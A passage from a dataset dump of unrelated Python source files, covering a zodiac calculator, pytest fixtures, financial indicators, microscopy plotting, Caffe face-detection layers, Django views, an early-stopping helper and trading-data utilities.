11):\r\n print(\"Ты - скорпион!\")\r\n elif (day >= 22 and month == 11) or (day <= 21 and month == 12):\r\n print(\"Ты - стрелец!\")\r\n elif (day >= 22 and month == 12) or (day <= 19 and month == 1):\r\n print(\"Ты - козерог!\")\r\n elif (day >= 20 and month == 1) or (day <= 18 and month == 2):\r\n print(\"Ты - водолей!\")\r\n elif (day >= 19 and month == 2) or (day <= 20 and month == 3):\r\n print(\"Ты - рыба!\")\r\n\r\n if year in range(1900, 2044):\r\n if (year - 1900) % 12 == 0:\r\n print(\"Вы родились в год крысы!\")\r\n elif (year - 1900) % 12 == 1:\r\n print(\"Вы родились в год быка!\")\r\n elif (year - 1900) % 12 == 2:\r\n print(\"Вы родились в год тигра!\")\r\n elif (year - 1900) % 12 == 3:\r\n print(\"Вы родились в год кота или кролика!\")\r\n elif (year - 1900) % 12 == 4:\r\n print(\"Вы родились в год дракона!\")\r\n elif (year - 1900) % 12 == 5:\r\n print(\"Вы родились в год змеи!\")\r\n elif (year - 1900) % 12 == 6:\r\n print(\"Вы родились в год лошади!\")\r\n elif (year - 1900) % 12 == 7:\r\n print(\"Вы родились в год овцы или козы!\")\r\n elif (year - 1900) % 12 == 8:\r\n print(\"Вы родились в год обезьяны!\")\r\n elif (year - 1900) % 12 == 9:\r\n print(\"Вы родились в год петуха!\")\r\n elif (year - 1900) % 12 == 10:\r\n print(\"Вы родились в год собаки!\")\r\n elif (year - 1900) % 12 == 11:\r\n print(\"Вы родились в год кабана или свиньи!\")\r\n else:\r\n print(\"Гороскоп на эти года неизвестен :-(\")\r\n\r\n break\r\n except ValueError:\r\n print(\"Введи в правильном формате, дегенерат!!!\")\r\n except MonthError:\r\n print(\"Введи правильный месяц\")\r\n except DayError:\r\n print(\"Введи правильный день\")","sub_path":"Pythonicus/l07/zodiac.py","file_name":"zodiac.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166416382","text":"import pytest\nfrom .support import ExtensionCompiler, DefaultExtensionTemplate,\\\n PythonSubprocessRunner, HPyDebugCapture\nfrom hpy.debug.leakdetector import LeakDetector\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--compiler-v\", action=\"store_true\",\n help=\"Print to stdout the commands used to invoke the compiler\")\n parser.addoption(\n \"--subprocess-v\", action=\"store_true\",\n help=\"Print to stdout the stdout and stderr of Python subprocesses\"\n \"executed via run_python_subprocess\")\n\n@pytest.fixture(scope='session')\ndef hpy_devel(request):\n from hpy.devel import HPyDevel\n return HPyDevel()\n\n@pytest.fixture(params=['cpython', 'universal', 'debug'])\ndef hpy_abi(request):\n abi = request.param\n if abi == 'debug':\n with LeakDetector():\n yield abi\n else:\n yield abi\n\n@pytest.fixture\ndef ExtensionTemplate():\n return DefaultExtensionTemplate\n\n\n@pytest.fixture\ndef compiler(request, tmpdir, hpy_devel, hpy_abi, ExtensionTemplate):\n compiler_verbose = request.config.getoption('--compiler-v')\n return ExtensionCompiler(tmpdir, hpy_devel, hpy_abi,\n compiler_verbose=compiler_verbose,\n ExtensionTemplate=ExtensionTemplate)\n\n\n@pytest.fixture(scope=\"session\")\ndef fatal_exit_code(request):\n import sys\n return {\n \"linux\": -6, # SIGABRT\n # See https://bugs.python.org/issue36116#msg336782 -- the\n # return code from abort on Windows 8+ is a stack buffer overrun.\n # :|\n \"win32\": 0xC0000409, # STATUS_STACK_BUFFER_OVERRUN\n }.get(sys.platform, -6)\n\n\n@pytest.fixture\ndef python_subprocess(request, hpy_abi):\n verbose = request.config.getoption('--subprocess-v')\n yield PythonSubprocessRunner(verbose, hpy_abi)\n\n\n@pytest.fixture()\ndef hpy_debug_capture(request, hpy_abi):\n assert hpy_abi == 'debug'\n with HPyDebugCapture() as reporter:\n yield reporter","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55370110","text":"#!/usr/bin/python3\n# coding=utf-8\nimport time\nfrom math import modf\n\n\nclass TimeHelper:\n def __init__(self):\n pass\n\n @staticmethod\n def getTime(timestamp):\n fTime = modf(timestamp / 1000.0)\n milSecond = int(fTime[0] * 1000)\n date = time.localtime(fTime[1])\n return {\n 'ms': milSecond,\n 'year': date.tm_year,\n 'mon': date.tm_mon,\n 'day': date.tm_mday,\n 'hour': date.tm_hour,\n 'min': date.tm_min,\n 'sec': date.tm_sec\n }\n\n @staticmethod\n def parseTime(date):\n t = time.strptime(date, \"%Y-%m-%d\")\n return time.mktime(t)\n\n @staticmethod\n def getStamp():\n return int(time.time() * 1000)\n\n @staticmethod\n def formatTime(timeStamp):\n fTime = modf(int(timeStamp) / 1000.0)\n date = time.gmtime(fTime[1])\n\n day = date.tm_mday > 10 and str(date.tm_mday) or \"0\" + str(date.tm_mday)\n mon = date.tm_mon > 10 and str(date.tm_mon) or \"0\" + str(date.tm_mon)\n year = str(date.tm_year)\n\n return year + \"-\" + mon + \"-\" + day\n\n\n","sub_path":"Twitter_Console/libs/TimeHelper.py","file_name":"TimeHelper.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191613637","text":"import numpy as np\nimport scipy as sp\nimport pandas as pd\n\ndef updown(ret):\n\t'show the daily up or down'\n\treturn np.sign(ret[:-1] - ret[1:])\n\ndef MA(ret, nvola):\n \"moving average\" \n length_company = len(ret)\n vola_company = [-1] * length_company#default \n if length_company < nvola:\n \treturn vola_company\n\n for j in range(length_company - nvola+1):\n \tvola_j=ret[j:(j + nvola)]\n \tvola_company[j] = sp.mean(vola_j)\n return vola_company\n\ndef VOL(ret,nvola):\n\t\"historical volatility\"\n\tlength_company = len(ret)\n\tvola_company = [-1] * length_company\n\tif length_company < nvola:\n\t\treturn vola_company\n\n\tfor j in range(length_company-nvola+1):\n\t\tvola_j = ret[j:(j+nvola)]\n\t\tvola_company[j] = sp.sqrt(sp.var(vola_j))\n\n\treturn vola_company\n\ndef RSI(closeprice,nRSIperiod):\n\t'require the closeprise to be pd.dataframe'\n\tlength_company=len(closeprice.values)\n\tgainloss_company= closeprice.values[:-1] - closeprice.values[1:]\n\tRSI_company = [-1] * length_company\n\tif length_company<=nRSIperiod:\n\t\treturn RSI_company\n\n\tfor j in range(length_company-nRSIperiod+1):\n\t\tgainloss_j=gainloss_company[j:(j+nRSIperiod)]\n\t\tgain_j = gainloss_j[gainloss_j >= 0]\n\t\tloss_j = gainloss_j[gainloss_j <0 ]\n\t\tavegain_j = sum(gain_j)/nRSIperiod\n\t\taveloss_j = sum(loss_j)/nRSIperiod\n\t\tRSI_company[j] = 100 - 100/(1+avegain_j/abs(aveloss_j))\n\treturn RSI_company\n\n\n\n\n\n\n\n\n\n\n","sub_path":"note/techFun.py","file_name":"techFun.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336799576","text":"from matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nimport pickle\nimport numpy as np\nimport seaborn as sns\nimport os\n\nfrom matplotlib.colors import hsv_to_rgb\nfrom matplotlib.colors import rgb_to_hsv\nimport cv2\nimport PIL\nfrom PIL import ImageEnhance\n\ndef plot_od(od, label=None, col=None):\n \"\"\"Produces a line plot from a ordered dictionary as used to store training process in the Model class\n \n Parameters\n ----------\n od: OrderedDict of floats\n DECODE model\n label: str\n Label\n col: 'str'\n Color\n \"\"\" \n plt.plot(*zip(*sorted(od.items())), label = label, color = col)\n\ndef create_3d_hist(preds, z_clip=None, pix_size=5, sigma=3, contrast_fac=10, clip_density=100): \n \"\"\"Produces a coloured histogram to display 3D reconstructions.\n \n Parameters\n ----------\n preds: list\n List of localizations with columns: 'localization', 'frame', 'x', 'y', 'z'\n z_clip: list of ints\n Clips the the z values at the given lower and upper limit to control the colorrange. \n pix_size: float\n Size of the pixel (nano meter) in the reconstruction plot\n sigma:\n Size of Gaussian used for blurring\n constrast fact: float\n Contrast can be scaled with this variable if the output image is to bright/dark\n clip_density: float \n Percentile between 0 and 100. Artifacts that produce extremely dense regions in the histrogram can \n mess up the contrast scaling. This parameter can be used to exclude the brightest regions. \n \n Returns\n -------\n Image: PIL image\n Coloured histogram of 3D reconstruction\n \"\"\" \n # adjust colormap\n lin_hue = np.linspace(0,1,256)\n cmap=plt.get_cmap('jet', lut=256);\n cmap = cmap(lin_hue)\n cmap_hsv = rgb_to_hsv(cmap[:,:3])\n storm_hue = cmap_hsv[:,0]\n _,b = np.unique(storm_hue, return_index=True)\n storm_hue = [storm_hue[index] for index in sorted(b)]\n n_val = len(storm_hue)\n storm_hue = np.interp(np.linspace(0,n_val,256), np.arange(n_val), storm_hue)\n \n x_pos = np.clip(np.array(preds)[:,2],0,np.inf)\n y_pos = np.clip(np.array(preds)[:,3],0,np.inf)\n z_pos = np.array(preds)[:,4] \n \n min_z = min(z_pos)\n max_z = max(z_pos)\n\n if z_clip is not None:\n z_pos[z_posz_clip[1]] = z_clip[1]\n zc_val = (z_pos -z_clip[0] ) / (z_clip[1] - z_clip[0])\n\n else:\n zc_val = (z_pos - min_z) / (max_z - min_z)\n\n z_hue = np.interp(zc_val,lin_hue,storm_hue)\n\n nx = int((np.max(x_pos))//pix_size+1)\n ny = int((np.max(y_pos))//pix_size+1)\n dims = (nx,ny)\n \n x_vals = np.array(x_pos//pix_size, dtype='int')\n y_vals = np.array(y_pos//pix_size, dtype='int')\n \n lin_idx = np.ravel_multi_index((x_vals, y_vals), dims)\n density = np.bincount(lin_idx, weights=np.ones(len(lin_idx)), minlength=np.prod(dims)).reshape(dims)\n density = np.clip(density,0,np.percentile(density,clip_density))\n zsum = np.bincount(lin_idx, weights=z_hue, minlength=np.prod(dims)).reshape(dims)\n zavg = zsum/density\n zavg[np.isnan(zavg)]=0\n\n hue = zavg[:,:,None]\n sat = np.ones(density.shape)[:,:,None]\n val = (density/np.max(density))[:,:,None]\n sr_HSV = np.concatenate((hue,sat,val),2)\n sr_RGB = hsv_to_rgb(sr_HSV)\n # %have to gaussian blur in rgb domain\n sr_RGBblur = cv2.GaussianBlur(sr_RGB,(11,11),sigma/pix_size)\n sr_HSVblur = rgb_to_hsv(sr_RGBblur)\n\n val = sr_HSVblur[:,:,2]\n\n sr_HSVfinal = np.concatenate((sr_HSVblur[:,:,:2],val[:,:,None]),2)\n sr_RGBfinal= hsv_to_rgb(sr_HSVfinal)\n \n sr_Im = PIL.Image.fromarray(np.array(np.round(sr_RGBfinal*256), dtype='uint8'))\n enhancer = ImageEnhance.Contrast(sr_Im)\n sr_Im = enhancer.enhance(contrast_fac)\n\n return sr_Im.transpose(PIL.Image.TRANSPOSE)\n\ndef create_2d_hist(preds, pix_size=5, sigma=3, contrast_fac=2, clip_density=100): \n \"\"\"Produces a coloured histogram to display 3D reconstructions.\n \n Parameters\n ----------\n preds: list\n List of localizations with columns: 'localization', 'frame', 'x', 'y', 'z'\n pix_size: float\n Size of the pixel (nano meter) in the reconstruction plot\n sigma:\n Size of Gaussian used for blurring\n constrast fact: float\n Contrast can be scaled with this variable if the output image is to bright/dark\n clip_density: float \n Percentile between 0 and 100. Artifacts that produce extremely dense regions in the histrogram can \n mess up the contrast scaling. This parameter can be used to exclude the brightest regions. \n \n Returns\n -------\n sr_blur: array\n Histogram of 2D reconstruction\n \"\"\" \n\n x_pos = np.clip(np.array(preds)[:,2],0,np.inf)\n y_pos = np.clip(np.array(preds)[:,3],0,np.inf) \n \n nx = int((np.max(x_pos))//pix_size+1)\n ny = int((np.max(y_pos))//pix_size+1)\n \n dims = (nx,ny)\n \n x_vals = np.array(x_pos//pix_size, dtype='int')\n y_vals = np.array(y_pos//pix_size, dtype='int')\n \n lin_idx = np.ravel_multi_index((x_vals, y_vals), dims)\n density = np.bincount(lin_idx, weights=np.ones(len(lin_idx)), minlength=np.prod(dims)).reshape(dims)\n density = np.clip(density,0,np.percentile(density,clip_density))\n\n val = (density/np.max(density)).T[:,:,None]\n\n sr_blur = cv2.GaussianBlur(val,(3,3),sigma/pix_size)\n sr_blur = np.clip(sr_blur, 0, sr_blur.max()/contrast_fac)\n\n return sr_blur\n","sub_path":"funcs/plot_funcs.py","file_name":"plot_funcs.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577791724","text":"import sys\nsys.path.append('/home/swang/work_space/caffe-c11/python')\nimport caffe\nimport cv2\nimport numpy as np\nimport random\nimport pickle as pickle\nimdb_exit = True\n\nrandom.seed(6)\n\n\ndef view_bar(num, total):\n rate = float(num) / total\n rate_num = int(rate * 100)\n r = '\\r[%s%s]%d%%' % (\"#\"*rate_num, \" \"*(100-rate_num), rate_num, )\n sys.stdout.write(r)\n sys.stdout.flush()\n\n################################################################################\n#########################Data Layer By Python###################################\n################################################################################\nclass Data_Layer_train(caffe.Layer):\n def setup(self, bottom, top):\n print(\"in setup\")\n self.batch_size = 384 # 64\n net_side = 12\n self.batch_loader = BatchLoader(net_side)\n top[0].reshape(self.batch_size, 3, net_side, net_side)\n top[1].reshape(self.batch_size, 1)\n top[2].reshape(self.batch_size, 4)\n top[3].reshape(self.batch_size, 10)\n\n def reshape(self, bottom, top):\n pass\n\n def forward(self, bottom, top):\n for itt in range(self.batch_size):\n im, label, roi, pts = self.batch_loader.load_next_image()\n # im, label, roi = self.batch_loader.load_next_image()\n top[0].data[itt, ...] = im\n top[1].data[itt, ...] = label\n top[2].data[itt, ...] = roi\n top[3].data[itt, ...] = pts\n\n def backward(self, top, propagate_down, bottom):\n pass\n\nclass BatchLoader(object):\n def __init__(self,net_side):\n\n print(\"Start Reading Train Data into Memory...\")\n if imdb_exit:\n fid = open('../prepare_data/12/12_all.imdb','rb')\n self.train_list = pickle.load(fid)\n fid.close()\n\n random.shuffle(self.train_list)\n self.cur = 0\n print(\"\\n\",str(len(self.train_list)),\" Train Data have been read into Memory...\")\n\n def load_next_image(self, ):\n if self.cur == len(self.train_list):\n self.cur = 0\n random.shuffle(self.train_list)\n cur_data = self.train_list[self.cur] # Get the image index\n im = cur_data[0]\n label = cur_data[1]\n roi = cur_data[2]\n pts = cur_data[3]\n # if label == 1 and random.choice([0,1]) == 1:\n # im = cv2.flip(im, 1)\n if random.choice([0,1]) == 1:\n if label == 1:\n im = cv2.flip(im, 1)\n roi[0] = roi[0] * -1.0\n roi[2] = roi[2] * -1.0\n # if label == 0:\n # im = cv2.flip(im, 1)\n # if label == -2:\n # im = cv2.flip(im, 1)\n # pts[0] = 1 - pts[0]\n # pts[2] = 1 - pts[2]\n # pts[4] = 1 - pts[4]\n # pts[6] = 1 - pts[6]\n # pts[8] = 1 - pts[8]\n # t = pts[0]; pts[0] = pts[2]; pts[2] = t\n # t = pts[1]; pts[1] = pts[3]; pts[3] = t\n # t = pts[6]; pts[6] = pts[8]; pts[8] = t\n # t = pts[7]; pts[7] = pts[9]; pts[9] = t\n self.cur += 1\n return im, label, roi, pts\n # return im, label, roi\n\n\n################################################################################\n#########################ROI Loss Layer By Python###############################\n################################################################################\nclass regression_Layer(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n if bottom[0].count != bottom[1].count:\n raise Exception(\"Input predict and groundTruth should have same dimension\")\n roi = bottom[1].data\n self.valid_index = np.where(roi[:,0] != -1)[0]\n self.N = len(self.valid_index)\n self.diff = np.zeros_like(bottom[0].data, dtype=np.float32)\n top[0].reshape(1)\n\n def forward(self,bottom,top):\n self.diff[...] = 0\n top[0].data[...] = 0\n if self.N != 0:\n self.diff[...] = bottom[0].data - np.array(bottom[1].data).reshape(bottom[0].data.shape)\n top[0].data[...] = np.sum(self.diff**2) / bottom[0].num\n\n\n def backward(self,top,propagate_down,bottom):\n for i in range(2):\n if not propagate_down[i] or self.N==0:\n continue\n if i == 0:\n sign = 1\n else:\n sign = -1\n bottom[i].diff[...] = sign * self.diff / bottom[i].num\n\n################################################################################\n#############################SendData Layer By Python###########################\n################################################################################\nclass cls_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n label = bottom[1].data\n self.valid_index = np.where(label >= 0)[0]\n self.count = len(self.valid_index)\n # count_1 = len(np.where(label == -1)[0])\n # count1 = len(np.where(label == 1)[0])\n # count0 = len(np.where(label == 0)[0])\n # print(\"count-1, count1, count0\", count_1, count1, count0)\n # print(\"label\", label[self.valid_index])\n # print(\"valid_index\", self.valid_index)\n # print(\"cls valid num\", self.count)\n # print(\"len(bottom[1].data\", len(bottom[1].data))\n # top[0].reshape(len(bottom[1].data), 2,1,1)\n # top[1].reshape(len(bottom[1].data), 1)\n top[0].reshape(self.count, 2,1,1)\n top[1].reshape(self.count, 1)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] = bottom[1].data[self.valid_index]\n # top[0].data[0:self.count] = bottom[0].data[self.valid_index]\n # top[1].data[0:self.count] = bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]\n\nclass reg_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n # label = bottom[2].data\n roi = bottom[1].data\n # self.valid_index = np.where(label != 0)[0]\n self.valid_index = np.where(roi[:,0] != -1)[0]\n self.count = len(self.valid_index)\n # print(\"label\", label)\n # print(\"valid_index\", self.valid_index)\n # print(self.count)\n top[0].reshape(self.count, 4,1,1)\n top[1].reshape(self.count, 4)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] = bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]\n\n\n\nclass pts_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n # label = bottom[2].data\n pts = bottom[1].data\n # self.valid_index = np.where(label != 0)[0]\n self.valid_index = np.where(pts[:,0] != -1)[0]\n self.count = len(self.valid_index)\n # print(\"pts\", pts)\n # print(\"valid_index\", self.valid_index)\n # print(self.count)\n top[0].reshape(self.count, 10,1,1)\n top[1].reshape(self.count, 10)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] = bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]","sub_path":"12net/pythonLayer.py","file_name":"pythonLayer.py","file_ext":"py","file_size_in_byte":8983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566428546","text":"from django.shortcuts import render\nfrom MainApp.models import *\nfrom django.shortcuts import redirect, render, render_to_response\nfrom django import forms\nfrom django.forms import ModelForm\n\n\nclass EmailForm(ModelForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = Email\n\n\ndef index(request):\n msg = None\n if request.method == 'POST':\n emailForm = EmailForm(request.POST)\n if emailForm.is_valid():\n emailForm.save()\n msg = 'Thank you'\n else:\n msg = 'Please enter your actual address :)'\n\n return render(request, 'Index.html', {'msg':msg})","sub_path":"iueditor/MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420125544","text":"# fixture and parameter have the same name\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n# WARNING: contract tests should use fully qualified imports to avoid issues\n# when being loaded by pytest\nfrom rpdk.core.contract.suite.handler_commons import test_read_failure_not_found\n\n\n@pytest.mark.read\ndef contract_read_without_create(resource_client):\n model = (\n resource_client.generate_invalid_create_example()\n ) # to allow invalid (correctly formatted primary id)\n test_read_failure_not_found(resource_client, model)\n","sub_path":"src/rpdk/core/contract/suite/handler_read.py","file_name":"handler_read.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634415755","text":"import logging\nimport tensorflow as tf\nFLAGS = tf.app.flags.FLAGS\nlogger = logging.getLogger(\"Ealiy Stop\")\n\nclass EarlyStop():\n ZERO=0\n BEST = 1\n CONTINUE = 2\n LEARNING_RATE_DECAY = 3\n STOP = -1\n\n def __init__(self,max_retry,max_learning_rate_decay):\n self.best_f1_value = 0\n self.learning_rate_counter = 0\n self.retry_counter = 0\n self.max_retry= max_retry\n self.max_learning_rate_decay = max_learning_rate_decay\n\n def decide(self,f1_value):\n\n if f1_value ==0:\n return EarlyStop.ZERO\n\n if f1_value>= self.best_f1_value:\n logger.debug(\"[早停]新F1值%f>旧F1值%f,记录最好的F1,继续训练\",f1_value,self.best_f1_value)\n # 所有的都重置\n self.retry_counter = 0\n self.learning_rate_counter = 0\n self.best_f1_value = f1_value\n return EarlyStop.BEST\n\n # 甭管怎样,先把计数器++\n self.retry_counter+=1\n logger.debug(\"[早停]新F1值%f<旧F1值%f,早停计数器:%d\", f1_value, self.best_f1_value,self.retry_counter)\n\n # 如果还没有到达最大尝试次数,那就继续\n if self.retry_counter < self.max_retry:\n logger.debug(\"[早停]早停计数器%d未达到最大尝试次数%d,继续训练\",self.retry_counter,self.max_retry)\n return EarlyStop.CONTINUE\n\n self.learning_rate_counter+=1\n logger.debug(\"[早停]早停计数器大于最大尝试次数%d,学习率Decay计数器现在是:%d\", self.max_retry,self.learning_rate_counter)\n\n # 如果还没有到达最大尝试次数,那就继续\n if self.learning_rate_counter < self.max_learning_rate_decay:\n self.retry_counter = 0 # 需要重置一下retry计数器\n logger.debug(\"[早停]学习率Decay计数器现在是:%d,未达到最大值%d,重置早停计数器,继续训练\",self.learning_rate_counter, self.max_learning_rate_decay)\n return EarlyStop.LEARNING_RATE_DECAY\n\n logger.debug(\"[早停]学习率Decay计数器%d、早停计数器%d都已经达到最大,退出训练\", self.retry_counter,self.learning_rate_counter)\n # 如果到达最大尝试次数,并且也到达了最大decay次数\n return EarlyStop.STOP","sub_path":"utils/early_stop.py","file_name":"early_stop.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448487119","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url\nfrom love.views import love, nice, testPost, writeNotes, readNotes, uploadFile, login, register, writeBlogs, readBlogs\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^love', love),\n url(r'^nice', nice),\n url(r'^testPost', testPost),\n url(r'^writeNotes', writeNotes),\n url(r'^readNotes', readNotes),\n url(r'^login', login),\n url(r'^register', register),\n url(r\"^uploadFile\", uploadFile),\n url(r\"^writeBlogs\", writeBlogs),\n url(r\"^readBlogs\", readBlogs),\n]\n","sub_path":"backend/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620672377","text":"# -*- coding:utf-8 -*-\n\nimport traceback\nimport pandas as pd\nfrom lib import GenConfig\nfrom .error import TradeDetailsRecordError\n\n\nclass TradeDataComposition:\n \"\"\"交易数据合成 ---\n 将历史交易数据与最新行情数据合成,比如支持计算动态移动平均线、MACD等\n \"\"\"\n # 数据文件中的字段名称\n F_OPEN = 'Open'\n F_CLOSE = 'Close'\n F_AVG = 'Avg'\n F_HIGH = 'High'\n F_LOW = 'Low'\n F_BUY = 'Buy'\n F_SELL = 'Sell'\n\n def __init__(self, datafile, logger=None):\n \"\"\"交易数据接口\n :param datafile: 数据文件名\n :param logger: 是否调试\n \"\"\"\n self.logger = logger\n self.datafile = datafile\n self.data = pd.read_csv(datafile, header=None, index_col=0)\n self.data.columns = [self.F_OPEN, self.F_CLOSE, self.F_HIGH, self.F_LOW, self.F_BUY, self.F_SELL]\n # 根据邻近性原则建立tick数据缓存区\n self.__mcache = {}\n\n def __del__(self):\n pass\n\n def M(self, date, field, count, price):\n \"\"\"计算移动平均值\n :param date: 交易日\n :param field: 字段\n :param count: 移动单位数\n :param price: 当前价\n :return:\n 参数不正确返回None,正常返回移动平均值\n \"\"\"\n try:\n return self.__mcache[date]['M'][field][count]\n except KeyError:\n ret = None\n dat = self.data[self.data.index <= date].tail(count-1)\n if count <= 1 or price <= 0:\n self.logger.error(f\"收到非法参数:count = {count}, price = {price}\")\n return ret\n elif len(dat) < count - 1:\n self.logger.error(f\"M值无效:len(dat) = {len(dat)}, count - 1 = {count - 1}\")\n return ret\n\n ret = float(sum(dat[field]) + price)/ (len(dat) + 1)\n\n if date not in self.__mcache.keys():\n # tick日期发生变化,依据邻近原则更新缓存区\n self.__mcache.clear()\n self.__mcache[date] = {}\n self.__mcache[date]['M'] = {}\n self.__mcache[date]['M'][field] = {}\n elif 'M' not in self.__mcache[date].keys():\n self.__mcache[date]['M'] = {}\n self.__mcache[date]['M'][field] = {}\n elif field not in self.__mcache[date]['M'].keys():\n self.__mcache[date]['M'][field] = {}\n\n self.__mcache[date]['M'][field][count] = ret\n return ret\n\n def get_field(self, date, field):\n \"\"\"获取指定交易时间指定字段值\n :param date: 交易时间\n :param field: 字段\n :return: 没有返回None,有则返回值\n \"\"\"\n try:\n dat = self.data[self.data.index == date]\n return dat[field][0]\n except IndexError:\n # 指定时间不存在\n return None\n\n def get_open(self, date):\n \"\"\"\n 获取指定交易时间开盘价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_OPEN)\n\n def get_close(self, date):\n \"\"\"获取指定交易时间收盘价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_CLOSE)\n\n def get_avg(self, date):\n \"\"\"获取指定交易时间平均价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_AVG)\n\n def get_high(self, date):\n \"\"\"获取指定交易时间最高价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_HIGH)\n\n def get_low(self, date):\n \"\"\"获取指定交易时间最低价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_LOW)\n\n def get_lowest_by_ticks(self, date, count, field):\n \"\"\"获得交易时间前指定个tick中的最小值\n :param date: 交易时间\n :param count: tick数\n :param field: 字段\n :return: 数据不存在则返回np.nan\n \"\"\"\n dat = self.data[self.data.index <= date].tail(count)\n return dat[field].min()\n\n def get_highest_by_ticks(self, date, count, field):\n \"\"\"获得交易时间前指定个tick中的最大值\n :param date: 交易时间\n :param count: tick数\n :param field: 字段\n :return: 数据不存在则返回np.nan\n \"\"\"\n dat = self.data[self.data.index <= date].tail(count)\n return dat[field].max()\n\n\nclass Position:\n \"\"\"持仓单位(仓位)\"\"\"\n\n # 仓位状态\n POS_STAT_OPEN = 1 # 开仓中\n POS_STAT_CLOSE = 2 # 平仓中\n POS_STAT_FINISH = 0 # 开平仓已完成\n POS_STAT_INVALID = -1 # 无效\n\n def __init__(self, pos=None, price=None, time=None, volume=None, direction=None, status=-1):\n \"\"\"加仓信息\n :param pos: 目标持仓数\n :param price: 成交价\n :param time: 时间\n :param volume: 开仓手数\n :param direction: 方向\n :param status: 状态\n \"\"\"\n self.target_pos = pos\n self.price = price\n self.time = time\n self.volume = volume\n self.direction = direction\n self.status = status\n\n def __str__(self):\n values = {'target_pos': self.target_pos, 'price': self.price, 'time': self.time,\n 'volume': self.volume, 'direction': self.direction, 'status': self.status}\n return str(values)\n\n def assign(self, values):\n \"\"\"赋值\n :param dict values: 赋值数据\n :return True|False\n \"\"\"\n try:\n passed_fields = values.keys()\n except Exception:\n return False\n\n if 'target_pos' in passed_fields:\n self.target_pos = values['target_pos']\n 